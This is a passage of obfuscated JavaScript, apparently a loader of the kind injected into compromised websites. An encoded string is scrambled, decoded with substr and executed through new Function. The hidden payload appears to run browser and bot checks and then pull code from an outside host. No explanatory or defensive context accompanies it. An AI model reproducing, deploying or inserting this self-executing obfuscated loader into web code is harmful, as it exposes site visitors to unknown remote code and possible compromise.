F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();